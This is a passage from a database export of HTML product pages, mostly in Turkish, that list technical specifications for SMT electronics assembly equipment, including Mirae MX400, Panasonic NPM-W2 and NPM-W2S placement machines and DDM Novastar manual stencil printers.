yapabilme</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p><a href=\"http://www.mirae.com/product/pro_01_4.asp\">&nbsp;</a></p>\r\n<table style=\"margin-left: 30px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Model İsmi</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">Mx400</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"180\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">Mx400P</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"4\" width=\"620\" height=\"17\">Performans</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"2\" width=\"142\" height=\"34\">Dizgi Hızı (IPC 9850)</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Chip (1005)</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">42000CPH (0.090sn/chip)</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"180\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">31000CPH (0.116sn/chip)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">QFP (208)</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">3500CPH</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"2\" width=\"142\" height=\"34\">Dizgi Doğruluğu</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Chip (3s)</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">±0.050mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">QFP (3s)</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">±0,025mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"4\" width=\"620\" height=\"17\">Malzeme Aralığı</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"142\" height=\"17\">Sabit Kamera (FOV 24)</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Tek FOV</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">0603~18mm kare (24x18mm dikdörtgen) / 0402mm Opsiyon</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"2\" width=\"142\" height=\"34\">Sabit Kamera (FOV 36)</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Tek FOV</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~32mm kare (42x32mm dikdörtgen)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">Çoklu FOV</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~50mm kare (90x30mm dikdörtgen)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"2\" width=\"142\" height=\"34\">Minimum Bacak Aralığı</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">FOV24 Kamera</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">0.30mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">FOV36 Kamera</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">0.38mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"4\" width=\"620\" height=\"17\">Kart ve Transfer Parametreleri</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"3\" width=\"142\" height=\"51\">Kart Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Minimum&nbsp;&nbsp;(LxWxT)</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">50x50x0.4mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">Maximum&nbsp;&nbsp;(LxWxT)</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">410x460x5.0mm / 680x460x5.0mm Opsiyon</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">Maximum&nbsp;&nbsp;Ağırlık</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">2kg</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Kart En Ayar</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">Manüel</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"4\" width=\"620\" height=\"17\">Genel Özellikler</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Kafa Sayısı</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">6 Modül + 6 Modül</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">6 Modül + 3 Hassas&nbsp;</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Maksimum Feeder Sayısı (8mm)</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">80</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"3\" width=\"142\" height=\"51\">Feeder Tipleri</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Makara Tip</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">8 (2P,4P), 12, 16, 24, 32, 44, 56, 72, 88mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">\r\n<p style=\"margin-left: 30px;\">Tray</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"180\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">TF5 (20 Tray Feeder Unit)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">Diğer</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">Vibration Stick Feeder, Manual Tray</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Güç Bağlantısı</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">3 Faz 200/208/220/230/240/380/400/415/430 Volts</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Güç Tüketimi</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~5 KVA</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Hava Bağlantısı</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">0.54Mps (5.4bar)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Hava Tüketimi</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~300N?/min</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"180\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~2400N?/min</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Ağırlık</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~1550kg</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Makine Boyutları (WxDxH)</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">1200x1900x1500mm</p>\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<div style=\"text-align: left;\">&nbsp;</div>\r\n<div style=\"text-align: left; margin-left: 30px;\"><br /><hr class=\"system-pagebreak\" style=\"width: 850.40625px; word-spacing: 0px;\" title=\"Malzemeler\" />&nbsp;\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Boyut Olarak;\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">0201 chip – 35mm kare IC (standart) veya 50mm kare IC (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme paketlenmesi</li>\r\n</ul>\r\n<ul>\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Makara</li>\r\n<li style=\"text-align: left;\">Tüp</li>\r\n<li style=\"text-align: left;\">Dökme</li>\r\n<li style=\"text-align: left;\">Kesik</li>\r\n<li style=\"text-align: left;\">Şerit</li>\r\n<li style=\"text-align: left;\">Tepsi&nbsp;</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme Paket Tipi</li>\r\n</ul>\r\n<ul>\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Chip (0201,0402,0603,…)</li>\r\n<li style=\"text-align: left;\">SOIC</li>\r\n<li style=\"text-align: left;\">PLCCQ</li>\r\n<li style=\"text-align: left;\">FPBGA,</li>\r\n<li style=\"text-align: left;\">CSP (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</div>','MX400','','','','mx200lp-3'),(40,'Max: 77,000cph / Modular','<h2><span style=\"text-align: left;\">PANASONIC SMD  Placement Machine (Ultra High-Speed)</span></h2>\r\n<ul>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maximum speed: 77,000cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">16, 12, 8 or 3 nozzle head options</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maximum of 750 x 550mm PCB</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">0.030mm placement accuracy</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">01005 ile 100x90mm range of components</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">8 - 104mm feeders + Tray unit</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Superior MMI</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Modular and flexible</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Fast product switching</li>\r\n</ul>\r\n<p style=\"text-align: left; margin-left: 30px;\"> </p>\r\n<table id=\"zebra-blue\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>MODEL NAME</p>\r\n</td>\r\n<td colspan=\"4\">\r\n<p style=\"text-align: center;\">NPM-W2 / NM-EJM7D</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Head</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>16-nozzle</p>\r\n</td>\r\n<td style=\"text-align: center;\">12-nozzle</td>\r\n<td style=\"text-align: center;\">8-nozzle</td>\r\n<td style=\"text-align: center;\">3-nozzle</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>PCB Dimensions</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>50x50mm - 750 x 550mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Speed (Max)</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>77,000cph</p>\r\n</td>\r\n<td style=\"text-align: center;\">64,500cph</td>\r\n<td style=\"text-align: center;\">40,000cph</td>\r\n<td style=\"text-align: center;\">8,500cph</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Speed (IPC) - Single lane</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>59,200cph</p>\r\n</td>\r\n<td style=\"text-align: center;\">49,500cph</td>\r\n<td style=\"text-align: center;\">-</td>\r\n<td style=\"text-align: center;\">-</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Component Range</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>01005\" chip -</p>\r\n<p>L6xW6xT3mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>01005\" chip -</p>\r\n<p>L12xW12XT6.5mm </p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> 01005\" chip -</p>\r\n<p>L32xW32xT12mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> 0201\" chip -</p>\r\n<p>L100xW90XT28mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Placement Accuracy</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.040 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.040 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> </p>\r\n<p>±0.040 mm/chip</p>\r\n<p> </p>\r\n<p>±0.030 mm/QFP</p>\r\n<p> </p>\r\n<p>±0.050 mm/QFP&lt;12mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Max. Feeder No</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>120 pcs (8mm tape)   </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Component Supply </p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>8 - 56mm feeder</p>\r\n</td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: 11px;\">8 - 56mm feeder</span> </td>\r\n<td style=\"text-align: center;\">\r\n<p><span style=\"font-size: 11px;\">8 - 56mm feeder</span> </p>\r\n<p>Stick: Max 8 pcs</p>\r\n<p>Tray</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p><span style=\"font-size: 11px;\">8 - 104mm feeder</span> </p>\r\n<p>Stick: Max 8 pcs</p>\r\n<p>Tray</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>Single tray</p>\r\n</td>\r\n<td style=\"text-align: center;\"> </td>\r\n<td style=\"text-align: center;\"> </td>\r\n<td style=\"text-align: center;\"> </td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dimensions</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>W 1280mm x D 2332mm x H 1444mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Weight</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>2,470kg (only body)</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<p style=\"text-align: left;\"> </p>','NPM-W2','','','','npm'),(63,'Max: 38,500cph / Modular','<h2><span style=\"text-align: left;\">PANASONIC SMD  Placement Machine (Ultra High-Speed)</span></h2>\r\n<ul>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maximum speed: 38,500cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">16, 12, 8 or 3 nozzle head options</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Single gantry</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maximum of 750 x 550mm PCB</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">0.030mm placement accuracy</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">01005 ile 100x90mm range of components</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">8 - 104mm feeders + Tray unit</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Superior MMI</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Modular and flexible</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Fast product switching</li>\r\n</ul>\r\n<p style=\"text-align: left; margin-left: 30px;\"> </p>\r\n<table id=\"zebra-blue\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>MODEL NAME</p>\r\n</td>\r\n<td colspan=\"4\">\r\n<p style=\"text-align: center;\">NPM-W2S / NM-EJM5E</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Head</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>16-nozzle</p>\r\n</td>\r\n<td style=\"text-align: center;\">12-nozzle</td>\r\n<td style=\"text-align: center;\">8-nozzle</td>\r\n<td style=\"text-align: center;\">3-nozzle</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>PCB Dimensions</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>50x50mm - 750 x 550mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Speed (Max)</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>38,500cph</p>\r\n</td>\r\n<td style=\"text-align: center;\">32,250cph</td>\r\n<td style=\"text-align: center;\">20,800cph</td>\r\n<td style=\"text-align: center;\">6,500cph</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Component Range</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>03015\" chip -</p>\r\n<p>L6xW6xT3mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>0402\" chip -</p>\r\n<p>L12xW12XT6.5mm </p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> 0402\" chip -</p>\r\n<p>L32xW32xT12mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> 0603\" chip -</p>\r\n<p>L150xW25XT30mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Placement Accuracy</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> </p>\r\n<p>±0.030 mm/chip</p>\r\n<p> </p>\r\n<p>±0.030 mm/QFP</p>\r\n<p> </p>\r\n<p>±0.050 mm/QFP&lt;12mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Max. Feeder No</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>120 pcs (8mm tape)   </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Component Supply </p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>8 - 56mm feeder</p>\r\n</td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: 11px;\">8 - 56mm feeder</span> </td>\r\n<td style=\"text-align: center;\">\r\n<p><span style=\"font-size: 11px;\">8 - 56mm feeder</span> </p>\r\n<p>Stick: Max 8 pcs</p>\r\n<p>Tray</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p><span style=\"font-size: 11px;\">8 - 104mm feeder</span> </p>\r\n<p>Stick: Max 8 pcs</p>\r\n<p>Tray</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>Single tray</p>\r\n</td>\r\n<td style=\"text-align: center;\"> </td>\r\n<td style=\"text-align: center;\"> </td>\r\n<td style=\"text-align: center;\"> </td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dimensions</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>W 1280mm x D 2447mm x H 1444mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Weight</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>2,390kg (only body)</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<p style=\"text-align: left;\"> </p>','NPM-W2S','','','','npm-w2s'),(41,'Manual - 508x432mm','<h2 style=\"text-align: left;\">DDM NOVASTAR - MANUAL SCREEN PRINTER</h2>\r\n<p style=\"text-align: left;\">Masa&uuml;st&uuml; man&uuml;el stencil printer</p>\r\n<ul style=\"text-align: left;\">\r\n<li>X,Y,Z ve theta ayar kontrol&uuml;</li>\r\n<li>Hizalamayı kolaylaştıran ger&ccedil;ek orta noktadan a&ccedil;ı ayarı</li>\r\n<li>G&uuml;venilir ve tekrarlanabilir sonu&ccedil;lar</li>\r\n<li>Z eksenini 4 bağımsız noktadan ayarlama</li>\r\n<li>&Ccedil;ift taraflı baskı ve FoilFrame opsiyonları</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>&Uuml;r&uuml;n Kodu</td>\r\n<td>SPR-20</td>\r\n</tr>\r\n<tr>\r\n<td>Doğrusal Baskı Desteği</td>\r\n<td>Yok</td>\r\n</tr>\r\n<tr>\r\n<td>Tahrikli Baskı Bı&ccedil;akları</td>\r\n<td>Yok</td>\r\n</tr>\r\n<tr>\r\n<td>&Ccedil;ift Baskı Bı&ccedil;ağı</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı A&ccedil;ısı</p>\r\n</td>\r\n<td>\r\n<p>Man&uuml;el</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı Hızı ve G&uuml;c&uuml;</p>\r\n</td>\r\n<td>\r\n<p>Man&uuml;el</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Otomatik &Ccedil;er&ccedil;eve Kaldırma Desteği</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>X &amp; Y Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>12.7mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Z Eksen Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>19mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>A&ccedil;ı Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>Tek Noktadan &plusmn;3&deg;</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Baskı Alanı</p>\r\n</td>\r\n<td>\r\n<p>305x380mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum &Ccedil;er&ccedil;eve Boyutu</p>\r\n</td>\r\n<td>\r\n<p>508x432mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>SMTrue G&ouml;r&uuml;nt&uuml; Desteği</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>FoilFrame Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&Ccedil;ift Y&uuml;zl&uuml; PCB Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Metal Bı&ccedil;ak Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Vakum PCB Tutucu Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>G&uuml;&ccedil; Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Hava Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ağırlık</p>\r\n</td>\r\n<td>\r\n<p>~22.7kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td>\r\n<p>533x711x280mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','SPR-20','','','','spr-20'),(42,'Manual - 584x584mm','<h2 style=\"text-align: left;\">DDM NOVASTAR - MANUAL SCREEN PRINTER</h2>\r\n<p style=\"text-align: left;\">Masa&uuml;st&uuml; man&uuml;el stencil printer</p>\r\n<ul>\r\n<li style=\"text-align: left;\">Hassas X,Y,Z ve theta ayar kontrol&uuml; ile fine-pitch bask</li>\r\n<li style=\"text-align: left;\">&Ccedil;iftli baskı bı&ccedil;ağı ile rahat ve temiz kullanım</li>\r\n<li style=\"text-align: left;\">Lineer yataklı rulman ile d&uuml;zg&uuml;n baskı hareketi</li>\r\n<li style=\"text-align: left;\">584x584mm &lsquo;ye kadar &ccedil;er&ccedil;eveler i&ccedil;in boyutları ayarlanabilir</li>\r\n<li style=\"text-align: left;\">Piston destekli kolay &ccedil;er&ccedil;eve kaldırma</li>\r\n<li style=\"text-align: left;\">Poli&uuml;retan veya metal bı&ccedil;ak se&ccedil;enekleri</li>\r\n<li style=\"text-align: left;\">PCB vakum tutma, &ccedil;ift taraflı baskı ve FoilFrame 